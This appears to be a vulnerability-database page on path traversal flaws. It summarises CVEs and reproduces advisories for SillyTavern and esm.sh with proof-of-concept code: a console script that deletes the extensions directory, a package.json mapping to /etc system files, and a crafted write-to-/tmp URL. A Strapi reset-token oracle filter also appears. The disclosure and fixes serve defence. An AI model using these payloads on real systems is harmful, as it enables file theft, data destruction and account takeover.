Boolean-oracle information disclosure in Strapi Content API allows remote unauthenticated attackers to extract admin password-reset tokens and achieve full administrative account takeover. Strapi versions 4.0.0 through 5.36.1 fail to sanitize relational query parameters on public content-type endpoints. By crafting `where` filters that traverse into joined `admin_users` table columns (e.g., `where[updatedBy][resetPasswordToken][$startsWith]=a`), attackers perform character-by-character oracle attacks against private admin fields, then use the extracted reset token to hijack administrator accounts. WildWest CyberSecurity reports this critical vulnerability with CVSS 9.3, affecting all Strapi deployments with public content-types containing admin-relation fields (`updatedBy`, `createdBy`, `publishedBy`). Vendor-released patch available in version 5.37.0. No active exploitation or public POC identified at time of analysis.
Path traversal in the Media Sync WordPress plugin (versions ≤1.4.9) enables authenticated attackers with Author-level access or above to read arbitrary files outside the intended uploads directory by injecting traversal sequences into the 'sub_dir' and 'media_items' parameters. The CVSS vector (C:H/I:N/A:N) confirms the impact is limited to confidentiality - file read only, with no write or deletion capability indicated. No public exploit has been identified at time of analysis, and CISA SSVC rates current exploitation as none with partial technical impact, consistent with the low EPSS probability of 0.45%.
Path traversal in ERPNext exposes arbitrary server files to authenticated low-privileged users via a vulnerable endpoint that fails to restrict directory access. Affected versions are ERPNext prior to 15.101.1 and the 16.x beta line prior to 16.10.0, packaged under CPE cpe:2.3:a:frappe:erpnext. An attacker with a valid account can craft a request to read sensitive files outside the intended directory scope, resulting in full confidentiality compromise of the host filesystem. No public exploit identified at time of analysis, and CISA SSVC signals no active exploitation.
Arbitrary file read in Grafana OSS exposes server filesystem contents to authenticated low-privilege users when the sqlExpressions feature toggle is enabled. Affected versions span the 11.6.x, 12.x, and 13.0.x release trains, with fixed security builds available across all affected branches. No public exploit code exists and CISA has not added this to the Known Exploited Vulnerabilities catalog; however, the confidentiality impact is rated High by CVSS due to the potential for unrestricted file disclosure from the Grafana server's filesystem.
Path traversal in Hermes WebUI's session import endpoint allows authenticated low-privileged attackers to read arbitrary files accessible to the WebUI process. By importing a crafted session JSON with an unrestricted workspace value such as '/', an attacker bypasses the workspace boundary controls that govern every other workspace-bearing endpoint, then leverages the file API to exfiltrate any file readable by the WebUI process user. No active exploitation is confirmed (absent from CISA KEV), EPSS sits at 0.04% in the 12th percentile, and SSVC rates exploitation as none - but the CVSS 4.0 confidentiality impact is rated High, making this a meaningful risk for network-exposed deployments with authenticated user populations.
Joomla com_fabrik 3.9.11 contains a directory traversal vulnerability that allows unauthenticated attackers to list arbitrary files by manipulating the folder parameter. Rated high severity (CVSS 8.7), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.
Path traversal in Lenovo Personal Cloud Storage devices allows authenticated remote attackers to move or access files belonging to other users on the same device, enabling unauthorized data disclosure and modification across user boundaries. Affects multiple product lines including Personal Cloud (T1, T2, T2S, T2Pro, X1, X1S, A1, A1S) and Home Storage Hub (T20, X20). CVSS 8.6 reflects high confidentiality and integrity impact with low attack complexity. No active exploitation confirmed in CISA KEV at time of analysis, and EPSS data not available for this 2026 CVE identifier.
Directory traversal vulnerability in F5 BIG-IP iControl REST endpoint when running in Appliance mode allows authenticated administrators to delete arbitrary files, crossing security boundaries. The vulnerability requires high-privilege administrator role access and network connectivity to the iControl REST interface, but no user interaction. Patch availability confirmed from F5; no active exploitation reported.
Authenticated high-privilege attackers with Resource Administrator or Administrator roles can download sensitive files from F5 BIG-IP iControl SOAP interface due to improper path validation. The vulnerability requires valid administrative credentials and does not affect versions that have reached End of Technical Support, limiting exposure to actively maintained deployments. No public exploit code or active exploitation has been identified.
Privilege escalation in F5 BIG-IP allows authenticated Resource Administrators to gain full Administrator privileges by exploiting insecure iControl SOAP API configuration handling. Attackers with high-privilege Resource Administrator access can modify configuration objects to escalate to Administrator level, achieving cross-scope access to confidential data and integrity compromise. EPSS risk assessment unavailable, but exploitation requires legitimate Resource Administrator credentials and network access to management interface, limiting attack surface to insider threats or compromised administrative accounts.
Authenticated low-privilege users can write arbitrary files to the BIG-IQ system filesystem via path traversal in an undisclosed iControl REST endpoint, enabling system compromise through configuration manipulation or code execution. F5 has released patches for supported versions. While requiring authentication (PR:L), the low complexity (AC:L) and network vector (AV:N) allow remote attackers with minimal access to achieve high integrity and availability impact through file overwrites of critical system or application files.
Directory traversal vulnerability in F5 BIG-IP SSL Orchestrator enables authenticated high-privilege attackers to overwrite, delete, or corrupt arbitrary local files via path manipulation. The vulnerability requires network access and valid high-privilege credentials but does not require user interaction, affecting the integrity of system files on affected BIG-IP instances. A vendor patch is available.
Path traversal in OpenPLC v3 allows authenticated remote attackers to read arbitrary files via unvalidated file path parameters passed to the glue_generator binary. The vulnerability affects command-line input handling in the compiled binary derived from glue_generator.cpp, where user-controlled paths are passed directly to file operation functions (fopen, ifstream, ofstream) without validation. Exploitation requires authentication but no user interaction, and no public exploit code has been identified at the time of analysis.
## Summary `POST /api/extensions/delete` endpoint accepts `extensionName: "."` which bypasses `sanitize-filename` validation, causing the entire user extensions directory to be recursively deleted. No authentication is required in the default configuration. ## Affected File `src/endpoints/extensions.js` (last modified: commit `3ad9b05e2`) ## Root Cause The validation check occurs **before** sanitization: ```javascript // [1] "." is truthy - passes the check if (!request.body.extensionName) { return response.status(400).send('Bad Request'); } // [2] sanitize(".") → "" const extensionPath = path.join(basePath, sanitize(extensionName)); // path.join("data\\default-user\\extensions", "") // = "data\\default-user\\extensions" ← basePath itself! // [3] Deletes the entire extensions directory await fs.promises.rm(extensionPath, { recursive: true }); ``` `sanitize-filename` converts `"."` to `""` (documented behavior). `path.join(basePath, "")` returns `basePath` itself. Result: the entire `data\default-user\extensions\` directory is deleted. ## Proof of Concept Tested on: Windows 10, SillyTavern v1.17.0, commit `004f1336e` Authentication: none (basicAuthMode: false, default configuration) Run in browser console (F12) while SillyTavern is open: ```javascript async function poc() { const { token } = await (await fetch('/csrf-token')).json(); const headers = { 'Content-Type': 'application/json', 'X-CSRF-Token': token, }; // Before: 1 extension installed const before = await (await fetch('/api/extensions/discover', { headers })).json(); console.log('Before:', before.filter(e => e.type === 'local')); // [{ type: 'local', name: 'third-party/Extension-Notebook' }] // Attack const res = await fetch('/api/extensions/delete', { method: 'POST', headers, body: JSON.stringify({ extensionName: '.' }), }); console.log('Status:', res.status); // 200 console.log('Body:', await res.text()); // "Extension has been deleted at data\default-user\extensions" // After: empty const after = await (await fetch('/api/extensions/discover', { headers })).json(); console.log('After:', after.filter(e => e.type === 'local')); // [] } poc(); ``` **Result:** Before: [{ type: 'local', name: 'third-party/Extension-Notebook' }] Status: 200 Body: Extension has been deleted at data\default-user\extensions After: [] ## Impact - **No authentication required** (`basicAuthMode: false` by default). Any user with network access to the SillyTavern instance can permanently delete the entire extensions directory with a single HTTP request. - All installed third-party extensions are unrecoverably lost. - With `global: true` and admin privileges, the global extensions directory shared across all users can also be deleted. - This vulnerability can be chained with CVE-2025-59159 (DNS rebinding) to enable unauthenticated remote exploitation from a malicious website. ## Same Pattern in Other Endpoints The same vulnerability exists in: - `POST /api/extensions/update` - `POST /api/extensions/version` - `POST /api/extensions/branches` - `POST /api/extensions/switch` ## Suggested Fix ```javascript const sanitized = sanitize(extensionName); // Check AFTER sanitizing if (!sanitized) { return response.status(400).send('Bad Request: Invalid extension name.'); } const extensionPath = path.join(basePath, sanitized); // Additional path traversal guard const resolvedPath = path.resolve(extensionPath); const resolvedBase = path.resolve(basePath); if (!resolvedPath.startsWith(resolvedBase + path.sep)) { return response.status(400).send('Bad Request: Invalid extension path.'); } ``` Apply the same fix to `/update`, `/version`, `/branches`, and `/switch` endpoints. ## References - CWE-22: Improper Limitation of a Pathname to a Restricted Directory - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H (9.1 Critical) - sanitize-filename npm: https://www.npmjs.com/package/sanitize-filename - Related CVE (same project): CVE-2025-59159 ##REPORTED BY Jormungandr
### Summary A Local File Inclusion (LFI) vulnerability exists in the esbuild plugin's handling of the `browser` field in `package.json`. An attacker can publish an npm package that causes the server to read and return arbitrary files from the host filesystem during the build process. ### Details The vulnerable code is in the `OnResolve` callback of the esbuild plugin: https://github.com/esm-dev/esm.sh/blob/main/server/build.go The plugin validates that resolved file paths stay within the package working directory. However, after this check, the `browser` field from `package.json` remaps the module path to an attacker-controlled value containing `../` sequences. No validation is performed after the remapping. ```go // Sandbox check passes for the original "./d1.txt" path if !strings.HasPrefix(filename, ctx.wd+string(os.PathSeparator)) { return esbuild.OnResolveResult{}, fmt.Errorf("could not resolve module %s", specifier) } // ... later, browser field remaps to attacker-controlled path: if len(pkgJson.Browser) > 0 && ctx.isBrowserTarget() { if path, ok := pkgJson.Browser[modulePath]; ok { if path == "" { return esbuild.OnResolveResult{ Path: args.Path, Namespace: "browser-exclude", }, nil } if !isRelPathSpecifier(path) { externalPath, sideEffects, err := ctx.resolveExternalModule(path, args.Kind, withTypeJSON, analyzeMode) if err != nil { return esbuild.OnResolveResult{}, err } return esbuild.OnResolveResult{ Path: externalPath, SideEffects: sideEffects, External: true, }, nil } modulePath = path } } // path.Join collapses "../" sequences - escapes the package directory filename = path.Join(ctx.wd, "node_modules", ctx.esmPath.PkgName, modulePath) // No second sandbox check ``` File contents appear in both the bundled JS output and the source map `sourcesContent` array. Readable files are constrained by esbuild's loader selection based on file extension: `.json` files must be valid JSON, `.txt`/`.html`/`.md` are read as raw text, files without a recognized extension must be syntactically valid JavaScript. The `config.json` of esm.sh is fully readable (valid JSON with `.json` extension). Non-existent target paths do not cause build errors - the import simply remains unresolved. This allows probing many paths in a single package, acting as a file existence oracle. ### PoC The test package is published at https://www.npmjs.com/package/chess-sec-utils1 **package.json:** ```json { "name": "chess-sec-utils1", "version": "1.0.6", "main": "index.js", "type": "module", "browser": { "./d1.txt": "../../../../../../../../etc/hostname", "./d2.json": "../../../../../../../../etc/os-release", "./d3.json": "../../../../../../../../etc/environment" } } ``` **index.js:** ```js import d1 from "./d1.txt" import d2 from "./d2.json" import d3 from "./d3.json" export default { d1, d2, d3 } ``` ```bash npm publish curl "https://<esm.sh-instance>/chess-sec-utils1@1.0.6" curl "https://<esm.sh-instance>/chess-sec-utils1@1.0.6/es2022/chess-sec-utils1.mjs.map" ``` Server file contents in source map response: ```json { "sourcesContent": [ "ideapad\n", "PRETTY_NAME=\"Ubuntu 22.04.5 LTS\"\nNAME=\"Ubuntu\"\nVERSION_ID=\"22.04\"\nVERSION=\"22.04.5 LTS (Jammy Jellyfish)\"\nVERSION_CODENAME=jammy\nID=ubuntu\nID_LIKE=debian\nHOME_URL=\"https://www.ubuntu.com/\"\nSUPPORT_URL=\"https://help.ubuntu.com/\"\nBUG_REPORT_URL=\"https://bugs.launchpad.net/ubuntu/\"\nPRIVACY_POLICY_URL=\"https://www.ubuntu.com/legal/terms-and-policies/privacy-policy\"\nUBUNTU_CODENAME=jammy\n", "PATH=\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin\"\n", "import d1 from \"./d1.txt\"..." ] } ``` <img width="1720" height="796" alt="image" src="https://github.com/user-attachments/assets/ee1c9781-2c5c-4718-b436-f6cf453f0952" /> ### Impact An attacker can read sensitive files from the server, including the esm.sh `config.json` which may contain npm registry authentication tokens and S3 storage credentials. ### Fix Add a path validation check after the `browser` field remapping: ```go filename = path.Join(ctx.wd, "node_modules", ctx.esmPath.PkgName, modulePath) if !strings.HasPrefix(filename, ctx.wd+string(os.PathSeparator)) { return esbuild.OnResolveResult{}, fmt.Errorf("path traversal blocked") } ``` ### Credit Svyatoslav Berestovsky of Metascan
### Impact - Arbitrary File Write - An attacker can cause the server to write data to any file path it has write permission for. - Privilege Escalation / RCE - By overwriting critical binaries or scripts, the attacker can execute arbitrary code with the server’s privileges. ### Exploit The legacy router first retrieves a response from `legacyServer`, parses the incoming request path, and ultimately writes the data to storage via `buildStorage.Put` (see <https://github.com/esm-dev/esm.sh/blob/4312ae93e518121e764a18bb521af12e490ef137/server/legacy_router.go#L291>). For a URL such as: ``` http://ESM_SH_HOST/v111/react@19.2.0/esnext/..%2f..%2f..%2fgh/<attacker>/exp@1171e85d5d/foo.md%23%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fpwned ``` the router concatenates the path components without sanitizing them, producing a storage key like: ``` legacy/v111/react@19.2.0/esnext/../../../gh/<attacker>/exp@1171e85d5d/foo.md#/../../../../../../../../../../tmp/pwned ``` When this key is used, the underlying file system resolves the relative segments and writes the file to `/tmp/pwned`. Thus an attacker can craft a request that writes data to arbitrary locations on the server. ### Details 1. **URL Construction** A crafted request is sent to the server: ``` http://ESM_SH_HOST/v111/react@19.2.0/esnext/..%2f..%2f..%2fgh/<attacker>/exp@1171e85d5d/foo.md%23%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fpwned ``` 2. **Proxy to Legacy Server** The request is forwarded to: ``` http://legacy.esm.sh/v111/react@19.2.0/esnext/../../../gh/<attacker>/exp@1171e85d5d/foo.md#/../../../../../../../tmp/pwned ``` which resolves to: ``` http://legacy.esm.sh/gh/<attacker>/exp@1171e85d5d/foo.md ``` 3. **File Retrieval** The server fetches `foo.md` from the GitHub repository `https://github.com/<attacker>/exp`. 4. **Path Normalisation & Storage** The storage path derived from the request is: ``` legacy/v111/react@19.2.0/esnext/../../../gh/<attacker>/exp@1171e85d5d/foo.md#/../../../../../../../../../../tmp/pwned ``` Normalising this path yields `/tmp/pwned`. The retrieved file content is then written to that location. 5. **Result** By repeating this pattern, an attacker can overwrite arbitrary binaries or scripts on the server, paving the way for remote code execution. ### Credit Discovery To splitline (@\_splitline\_) from DEVCORE Research Team
Heym before 0.0.21 contains a path traversal vulnerability in the file upload endpoint that allows authenticated users to write attacker-controlled files to arbitrary locations by supplying a crafted filename with traversal sequences. Attackers can exploit the unvalidated filename parameter in the upload_file() handler to bypass path restrictions and write, read, or delete files outside the intended storage directory.
Quick Facts
- Typical Severity
- HIGH
- Category
- web
- Total CVEs
- 7723